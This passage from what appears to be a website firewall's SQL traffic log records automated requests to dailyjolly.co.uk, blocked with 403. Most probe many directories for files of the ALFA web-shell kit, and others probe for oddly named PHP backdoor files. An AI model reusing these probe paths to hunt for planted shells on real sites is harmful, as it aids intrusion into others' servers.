Mobile Safari\\/537.36\"}','zQo97NHiS3laWIR4DK61Pyqj',0,1674312401.7196,204,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','CPdVmb4NrR2gks8i0c9JXaD7',0,1674312402.2065,169,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/.quarantine/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','4AfiqIHMv7ocNspjhTXynJ3d',0,1674312402.6570,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BhOi0YRKU9oIjzJ67mNcxFHe',0,1674312408.6071,167,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','uaTW8DpmrXFb6ACBkZlxnqSv',0,1674312409.0825,186,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','mefY78r93MDcliOoEyskjG4a',0,1674312409.5169,158,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Pvs0XojBw5OK1l2xgM639NdF',0,1674312416.1880,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','DCg1XbiLsMuH6QV2TyoIOS8N',0,1674312416.6361,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/cgi-bin/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','2YMzVymg1x4so8X9HlIe6LJa',0,1674312417.0016,190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','EWL0tiDXVcNuI6qx41S7CF85',0,1674312421.1712,194,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MkqieXWmpZBgNScDYb3Hl5tJ',0,1674312421.6640,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HNF1mS0Xfg8aPAlzVExvT2ip',0,1674312422.0304,178,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','cabli4hopgj6zQnZ8my1uB7N',0,1674312426.8744,222,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','IwlfxjMdL2esAntXBQERZkph',0,1674312427.2930,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/images/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','HtVmyaJ1hZe763zkb8iKqorT',0,1674312427.6603,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','m9orL8V1UegKck6MJihsQ0n3',0,1674312433.2718,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','c5dAQmaOtsHrCUWPNKZj97iR',0,1674312433.8145,200,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','vVLaHKJUF2tsxE86czSYPb9X',0,1674312434.2322,232,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','GutbZEC8URo06Iepm9yzJncQ',0,1674312439.5148,177,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','TvSV1PLDxWOIuleX4i9fpsrn',0,1674312439.9234,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/components/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','xDojFJ1VhkLn825CNbYpHtSW',0,1674312441.7225,248,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','9EXCbTkGHdSgiyUWcONDpl2x',0,1674312446.2434,180,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aIe2NrBC6gnch9jfM8Gpqk3T',0,1674312446.6749,184,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','JizNqCLQD6Tw31uh0Kga4tc9',0,1674312447.0672,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','BoJR12eEu7WXDQpMVzdIj83a',0,1674312452.4327,156,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','5S7RJHs6twPDZLg23ouea0yM',0,1674312452.7925,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wordpress/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Fmnvh5VW0abXMsp29JDCcxwQ',0,1674312453.2228,170,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','qh8mrWP7kbUdGaw1YSHCgflK',0,1674312457.9665,188,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','0nubJ82wSsPGXFHf4Te7lOtI',0,1674312458.3454,166,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','4ABkOrbD5PFoVqn973tRcHei',0,1674312458.7140,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','TLrBWsI34l7jvVdN9pGH8Czm',0,1674312463.4916,211,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','KNqHjms1UQvBF8GwzL2aRWTV',0,1674312463.9418,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/wp/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','hqaiE9P2by8QmxvYLT7JpVWr',0,1674312464.3349,162,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','sbWiot3jATZPr1MyHRqzCxlc',0,1674312469.8548,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','RCfZDyM68uwLEeTOqBASmF4k',0,1674312470.2688,160,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','fhk7cqZ9MLPEoz1AbUXwTGel',0,1674312470.6286,209,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','SEG9oNXsgtRLTqUj80YHPV7Z',0,1674312476.9843,199,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','ATunyGPwlfsk7NYaFW6d0b8v',0,1674312477.4497,164,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/blog/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','NFQrOme4An5Eo3d0zYI2ijup',0,1674312477.8104,171,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','tUBwh3rSCFfMR5DYdITkv4mX',0,1674312483.1863,193,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','pGqVf5uxWdYvDEbAOwIRPHmo',0,1674312483.6062,156,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','MqVlbXnsi08gmZcFBhPrNe3A',0,1674312483.9498,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','aohUdzltKngH9LYQqVJXC5ys',0,1674312488.0292,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','nUEgri2eohWaCGFjD6lQ8fAX',0,1674312488.3891,201,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/new/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','k7WsaHbruovTUicM15JKjfnt',0,1674312488.7815,166,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','yeCKchdzSmlV5wYU9H260i1Q',0,1674312498.8947,168,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','PljRUMWK1y2Ea8fLYsvxrS49',0,1674312499.3375,172,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','kn2YjlJHSzuL9d03bNT5EaoP',0,1674312499.7081,202,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','Rzs3W2KFbSTkjBEDLHMh7tC6',0,1674312504.7297,173,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','LxjTncIhmlkJtOfzZdo2G5v7',0,1674312505.1277,163,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/old/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','WAJp1Q2EYVhUdXMtqbkDfiCc',0,1674312505.5672,197,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','8Qn6i9xVu4zlGpUNFtyjmHeX',0,1674312511.0002,190,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','wzMBxDyoHlCc157sGa9KUedp',0,1674312511.4446,204,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1Wnx7aF6Xv2iLOEDUZ0kyMQJ',0,1674312511.8283,202,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/index.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','IvGMXpmycRuDd1W07BwK4QrE',0,1674312518.1518,180,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/radio.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','XafTVSn5u3CliJUWQNG1kg8m',0,1674312518.5670,175,'','GET',403,0,700,0,1,'',0),('35.183.107.9',599223049,'','https://www.dailyjolly.co.uk/backup/ALFA_DATA/alfacgiapi/404.php?bx=0e215962017','','{\"1\":\"Mozilla\\/5.0 (Linux; Android 11; Redmi Note 9 Pro Build\\/RKQ1.200826.002; wv) AppleWebKit\\/537.36 (KHTML, like Gecko) Version\\/4.0 Chrome\\/90.0.4430.210 Mobile Safari\\/537.36\"}','1B2GXTdILp8skJPhe3yUlNj4',0,1674312519.0645,156,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/1index.php?http://dailyjolly.co.uk/1index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','0lYweUyvQMpB6ubqAtakN8fO',0,1674319210.6970,288,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/11index.php?http://dailyjolly.co.uk/11index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','qj394XR6x0w2T5vncDKaidOE',0,1674319212.5912,174,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/2index.php?http://dailyjolly.co.uk/2index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','TmqG4V8uMEwNUJ7aXvjKxsi5',0,1674319216.9567,2190,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/3index.php?http://dailyjolly.co.uk/3index.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','DlHsVtCS9zhi4fx6YP7bckQr',0,1674319223.8114,221,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp_wrong_datlib.php?http://dailyjolly.co.uk/wp_wrong_datlib.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 (.NET CLR 3.5.30729)\"}','xOv2gYcJLrCF9moqtMRQWHau',0,1674319229.7999,227,'','GET',403,0,700,0,1,'',0),('216.226.146.228',3638727396,'','https://dailyjolly.co.uk/wp-adminincludesclass-wp-media-list-data.php?http://dailyjolly.co.uk/wp-adminincludesclass-wp-media-list-data.php','','{\"1\":\"Mozilla\\/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.5) Gecko\\/20091102 Firefox\\/3.5.5 